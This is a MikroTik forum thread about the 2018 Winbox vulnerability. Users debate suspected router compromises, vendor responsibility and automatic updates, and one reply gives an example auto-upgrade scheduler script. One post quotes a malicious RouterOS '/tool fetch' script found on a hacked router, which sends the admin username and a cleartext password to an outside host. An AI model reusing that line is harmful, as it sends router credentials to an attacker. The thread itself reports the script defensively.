Winbox vulnerability: please upgrade

normis · September 12, 2018, 7:43am

Sorry I don’t understand that question. Try to re-phrase it.

Deantwo · September 12, 2018, 7:50am

He is talking about what he said in http://forum.mikrotik.com/t/winbox-vulnerability-please-upgrade/122004/180 a job is shown to be running, yet the configuration doesn’t appear to have any scripts in it.
But as I said, from the picture and config alone, I doubt we can’t tell him what it is. Unless you happen to know anything else that appear in the job list than scripts.

normis · September 12, 2018, 7:53am

This is normal, if you open a Terminal. There is no hacker here.

tiktakmik · September 12, 2018, 7:57am

I have another similar configuration of CHR (not previosly hacked). Before asking, I checked there and didn’t see any jobs.
So I suspect a hacker backdoor.

tiktakmik · September 12, 2018, 8:01am

ok. confirm this!

now we can go on to discuss the journey in winter

Deantwo · September 12, 2018, 8:13am

I feel stupid for forgetting this detail… knew I was forgetting something.
Anyway, thanks for the confirmation.

wpeople · September 13, 2018, 4:02pm

Just found this on a customer router (where winbox was open for world, running 6.42.3) in system/scripts

{/tool fetch url=(“http://www.boss-ip.com/Core/Update.ashx?key=7da1df40bdee0309&action=upload&sncode=E014B372E8F5165AD6432DD4F81E1A03&dynamic=static&user=admin&pwd=Cleartextpass”)}

spacemind · September 15, 2018, 6:09pm

…

BartoszP · September 15, 2018, 7:14pm

What do you want to say? Have you example of hacked 6.42.7 or are you just guessing and making noise?

spacemind · September 15, 2018, 7:29pm

post deleted … contacted support instead.

kobuki · September 15, 2018, 7:37pm

I’m not advocating for Mikrotik but please stop this. It’s very annoying and I’m really not sure if you’re just trolling, speaking on behalf of a competitor or you have a genuine case of hacking. Tell us all details, like how you’ve checked there were no default empty or easy to guess passwords, proxy service or firewall rules enabled that make it easy to use the router as a starting point for hackers, etc. If you’re not 100% positive the break-in is a result of a new security hole then you should consider removing your post and rethink what you post here. We’re all here to share info on all the existing exploits and how to deal with them. If you happen to find a genuine one, make a support request with a supout file and file a support request instead.

spacemind · September 15, 2018, 8:01pm

kobuki i’m using Mikrotik since version 2, i watched the huge improvement in Mikrotik hardware. I have thousands of deployed mikrotik networks since 2001.

thank you for your sugestion but i’m getting a bit tired of this magnific hardware with crazy and buggy software.

I replaced a few hacked routers and will investigate whats happened.

Bye
R.

zvekyf · September 16, 2018, 6:18pm

is there maybe a plan to add auto update option and set that as default option?
There are many routers which will never be updated or until something real bad happens.

Also maybe to add option to auto update only security fixes.

This way every router will be immediately patched/updated(unmanaged) and IT folks(managed) can select manual updates but set auto update for security fixes.

Deantwo · September 17, 2018, 7:51am

The issue with doing that is that users won’t know what is happening.
For example if they notice their internet going down their first instinct might be to reboot the router. Rebooting the router while in it is in the middle of installing an upgrade might break the router. And the aveage user will not want to learn how to use NetInstall.

It isn’t MikroTik’s job to update your router for you, it is only their job to make you able to update it easily and quickly.
All it takes is a simple scheduler script to make it auto update, and if you make it use the “bugfix”/“long-term” channel it will only update when it is an important update.

Maybe an example of such an auto update scheduler script should be added to the wiki/manual?

mrz · September 17, 2018, 8:07am

Example is already in the manual:
https://wiki.mikrotik.com/wiki/Manual:Upgrading_RouterOS#RouterOS_auto-upgrade

Deantwo · September 17, 2018, 8:27am

Ah very nice, thanks.
But it would be nice if the example also included “set channel=bugfix”, since that took me a moment to find. I can’t even see the word “channel” being mentioned at all on the whole page.

For example:

/system package update
set channel=bugfix
check-for-updates once
:delay 1s;
:if ( [get status] = "New version is available" ) do={ install }

EDIT: Appears to be called “release chains” on the page, here: https://wiki.mikrotik.com/wiki/Manual:Upgrading_RouterOS#RouterOS_version_release_chains

spacemind · September 17, 2018, 8:57am

Sorry to disagree but you’r wrong, It is MIKROTIK job to update our router’s software when critical vulnerability is on the way.

If we buy mikrotik powerfull routers we must have this critical support.

Try to buy a Tesl… car or other smart car with this kind of critical vulnerability and have them to tell you that you need to update the software by yourself ( and its your problem if you didn’t update it…)

Best Regards
R.

normis · September 17, 2018, 9:27am

I disagree. It is the job of the administrator to configure the device securerly, and then decide when to upgrade. MikroTik can’t reboot mission critical devices without consent. We have no access to your devices.

The vulnerability doesn’t affect anyone that has the default firwall, or has configured his own firewall correctly.

sid5632 · September 17, 2018, 9:32am

No, it you who is WRONG. Now why don’t you toddle off to Microsoft and get a copy of Windows 10. Then you can have as many automated updates at inconvenient times as you like.

spacemind · September 17, 2018, 10:02am

Oh… Am i wrong ? ROS has bugs, but its not windows 10, its much better, and dont forget that Mikrotik is selled all aroud the world to end customers.